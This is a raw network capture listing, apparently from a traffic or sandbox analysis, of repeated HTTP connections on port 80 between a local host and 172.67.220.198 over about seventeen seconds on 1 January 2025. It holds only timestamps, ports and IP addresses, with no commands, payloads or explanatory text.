                                                                                                                                Jan 1, 2025 21:47:43.786777973 CET8049763172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:44.156883001 CET4976380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:44.161734104 CET8049763172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:44.226103067 CET8049763172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:44.280275106 CET4976380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:44.507297993 CET8049763172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:44.561517000 CET4976380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:44.635504961 CET4976380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:44.636096954 CET4976480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:44.640516996 CET8049763172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:44.640583992 CET4976380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:44.640866041 CET8049764172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:44.640925884 CET4976480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:44.641060114 CET4976480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:44.645848036 CET8049764172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:45.019877911 CET4976480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:45.024719954 CET8049764172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:45.111927032 CET8049764172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:45.155359983 CET4976480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:45.196578026 CET4976480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:45.201638937 CET8049764172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:45.201704979 CET4976480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:45.225204945 CET4976580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:45.230021000 CET8049765172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:45.230082035 CET4976580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:45.230207920 CET4976580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:45.234925985 CET8049765172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:45.477258921 CET4976680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:45.482167959 CET8049766172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:45.482229948 CET4976680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:45.482342005 CET4976680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:45.487065077 CET8049766172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:45.582808971 CET4976580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:45.587711096 CET8049765172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:45.587744951 CET8049765172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:45.674057961 CET8049765172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:45.717863083 CET4976580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:45.827227116 CET4976680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:45.832078934 CET8049766172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:45.954524040 CET8049766172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:45.980638981 CET8049765172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:45.999017000 CET4976680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:46.030262947 CET4976580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:46.226491928 CET8049766172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:46.280260086 CET4976680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:46.318886042 CET8049766172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:46.374012947 CET4976680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:46.542303085 CET4976580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:46.542345047 CET4976680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:46.543009043 CET4976780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:46.547308922 CET8049765172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:46.547585011 CET8049766172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:46.547652960 CET4976680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:46.547665119 CET4976580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:46.547811031 CET8049767172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:46.549897909 CET4976780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:46.550029039 CET4976780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:46.554877043 CET8049767172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:46.958040953 CET4976780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:46.962891102 CET8049767172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:46.993017912 CET8049767172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:47.045892954 CET4976780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:47.234802008 CET8049767172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:47.280278921 CET4976780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:47.432455063 CET4976280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:47.445369959 CET4976780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:47.446074009 CET4976880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:47.450417995 CET8049767172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:47.450488091 CET4976780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:47.450872898 CET8049768172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:47.451030970 CET4976880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:47.451222897 CET4976880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:47.455961943 CET8049768172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:47.795994997 CET4976880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:47.800868034 CET8049768172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:47.899492979 CET8049768172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:47.952147007 CET4976880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:48.161886930 CET8049768172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:48.168947935 CET4976880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:48.174185038 CET8049768172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:48.179826021 CET4976880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:48.291935921 CET4976980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:48.296840906 CET8049769172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:48.296947002 CET4976980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:48.297028065 CET4976980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:48.301805019 CET8049769172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:48.655471087 CET4976980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:48.660321951 CET8049769172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:48.754667044 CET8049769172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:48.795994997 CET4976980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:49.017904997 CET8049769172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:49.061783075 CET4976980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:49.135431051 CET4976980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:49.136238098 CET4977080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:49.140424013 CET8049769172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:49.140480995 CET4976980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:49.141036034 CET8049770172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:49.141172886 CET4977080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:49.141230106 CET4977080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:49.146006107 CET8049770172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:49.501610041 CET4977080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:49.506467104 CET8049770172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:49.589566946 CET8049770172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:49.639656067 CET4977080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:49.861120939 CET8049770172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:49.905289888 CET4977080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.033633947 CET4977080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.034239054 CET4977180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.038722038 CET8049770172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:50.038772106 CET4977080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.039079905 CET8049771172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:50.039165020 CET4977180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.042603970 CET4977180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.047401905 CET8049771172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:50.389770031 CET4977180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.394633055 CET8049771172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:50.492729902 CET8049771172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:50.545909882 CET4977180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.771249056 CET8049771172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:50.811523914 CET4977180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.886100054 CET4977180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.886657953 CET4977380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.891168118 CET8049771172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:50.891350031 CET4977180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.891419888 CET8049773172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:50.891566992 CET4977380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.891716957 CET4977380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.896482944 CET8049773172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:50.984302998 CET4977380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.984987020 CET4977480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.989830971 CET8049774172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:50.990034103 CET4977480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.990123034 CET4977480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:50.994874001 CET8049774172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:51.032633066 CET8049773172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:51.107213020 CET4977580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:51.111989975 CET8049775172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:51.112118959 CET4977580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:51.112231016 CET4977580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:51.116972923 CET8049775172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:51.297367096 CET8049773172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:51.297426939 CET4977380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:51.342860937 CET4977480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:51.347707987 CET8049774172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:51.347875118 CET8049774172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:51.467834949 CET4977580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:51.472704887 CET8049775172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:51.499819040 CET8049774172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:51.545907974 CET4977480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:51.587651968 CET8049775172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:51.639650106 CET4977580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:51.764488935 CET8049774172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:51.811687946 CET4977480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:51.850878000 CET8049775172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:51.905271053 CET4977580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:51.962908983 CET4977580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:51.962913990 CET4977480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:51.963689089 CET4977680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:51.967906952 CET8049775172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:51.968024015 CET4977580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:51.968087912 CET8049774172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:51.968136072 CET4977480192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:51.968596935 CET8049776172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:51.968698978 CET4977680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:51.969460964 CET4977680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:51.974236965 CET8049776172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:52.327572107 CET4977680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:52.332504988 CET8049776172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:52.421494961 CET8049776172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:52.467802048 CET4977680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:52.692080021 CET8049776172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:52.749181032 CET4977680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:52.950495958 CET4977780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:52.955334902 CET8049777172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:52.957895041 CET4977780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:52.958625078 CET4977780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:52.963453054 CET8049777172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:53.314246893 CET4977780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:53.319171906 CET8049777172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:53.430330992 CET8049777172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:53.470705986 CET4977780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:53.601663113 CET8049777172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:53.655272007 CET4977780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:53.857270002 CET4977780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:53.857887030 CET4977880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:53.862421989 CET8049777172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:53.862481117 CET4977780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:53.862747908 CET8049778172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:53.862822056 CET4977880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:53.862956047 CET4977880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:53.867775917 CET8049778172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:54.217885017 CET4977880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:54.222834110 CET8049778172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:54.307132006 CET8049778172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:54.358432055 CET4977880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:54.575320959 CET8049778172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:54.624043941 CET4977880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:54.697330952 CET4977880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:54.697623968 CET4978080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:54.702320099 CET8049778172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:54.702394009 CET8049780172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:54.702464104 CET4977880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:54.702483892 CET4978080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:54.703042984 CET4978080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:54.707798958 CET8049780172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:55.062002897 CET4978080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:55.066915035 CET8049780172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:55.165779114 CET8049780172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:55.217772961 CET4978080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:55.432388067 CET8049780172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:55.483418941 CET4978080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:55.610760927 CET4977680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:55.613729954 CET4978080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:55.614043951 CET4978680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:55.618765116 CET8049780172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:55.618844986 CET8049786172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:55.618911982 CET4978080192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:55.618951082 CET4978680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:55.621249914 CET4978680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:55.626105070 CET8049786172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:55.967976093 CET4978680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:55.972780943 CET8049786172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:56.090771914 CET8049786172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:56.139656067 CET4978680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:56.268455029 CET8049786172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:56.311541080 CET4978680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:56.386140108 CET4978680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:56.386755943 CET4979280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:56.391096115 CET8049786172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:56.391144991 CET4978680192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:56.391546011 CET8049792172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:56.391616106 CET4979280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:56.391701937 CET4979280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:56.396459103 CET8049792172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:56.749160051 CET4979280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:56.753974915 CET8049792172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:56.781519890 CET4979880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:56.781969070 CET4979280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:56.786406040 CET8049798172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:56.787038088 CET8049792172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:56.787137032 CET4979280192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:56.787184000 CET4979880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:56.787184000 CET4979880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:56.791970015 CET8049798172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:56.963989019 CET4979980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:56.968858957 CET8049799172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:56.968946934 CET4979980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:56.969068050 CET4979980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:56.973937988 CET8049799172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:57.139745951 CET4979880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:57.144541979 CET8049798172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:57.144722939 CET8049798172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:57.235243082 CET8049798172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:57.280313015 CET4979880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:57.327347994 CET4979980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:57.332154989 CET8049799172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:57.412930012 CET8049799172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:57.467797995 CET4979980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:57.512482882 CET8049798172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:57.561590910 CET4979880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:57.671359062 CET8049799172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:57.717792034 CET4979980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:57.790551901 CET4979880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:57.790553093 CET4979980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:57.791292906 CET4980580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:57.795629025 CET8049799172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:57.795686960 CET4979980192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:57.796006918 CET8049798172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:57.796056032 CET4979880192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:57.796132088 CET8049805172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:57.796205997 CET4980580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:57.796283007 CET4980580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:57.801018953 CET8049805172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:58.179810047 CET4980580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:58.184598923 CET8049805172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:58.240447044 CET8049805172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:58.295929909 CET4980580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:58.542028904 CET8049805172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:58.592802048 CET4980580192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:58.669548988 CET4981180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:58.674431086 CET8049811172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:58.674506903 CET4981180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:58.674599886 CET4981180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:58.679323912 CET8049811172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:59.030354023 CET4981180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:59.035157919 CET8049811172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:59.128249884 CET8049811172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:59.170960903 CET4981180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:59.405613899 CET8049811172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:59.452208996 CET4981180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:59.523799896 CET4981180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:59.524395943 CET4981780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:59.528915882 CET8049811172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:59.529067993 CET4981180192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:59.529170990 CET8049817172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:59.529232025 CET4981780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:59.529432058 CET4981780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:59.534203053 CET8049817172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:59.874808073 CET4981780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:47:59.879682064 CET8049817172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:47:59.972004890 CET8049817172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:00.014669895 CET4981780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:00.228523970 CET8049817172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:00.280411959 CET4981780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:00.353773117 CET4981780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:00.354398012 CET4982380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:00.358747959 CET8049817172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:00.358798981 CET4981780192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:00.359230995 CET8049823172.67.220.198192.168.2.4
                                                                                                                                Jan 1, 2025 21:48:00.359293938 CET4982380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:00.359385014 CET4982380192.168.2.4172.67.220.198
                                                                                                                                Jan 1, 2025 21:48:00.364103079 CET8049823172.67.220.198192.168.2.4
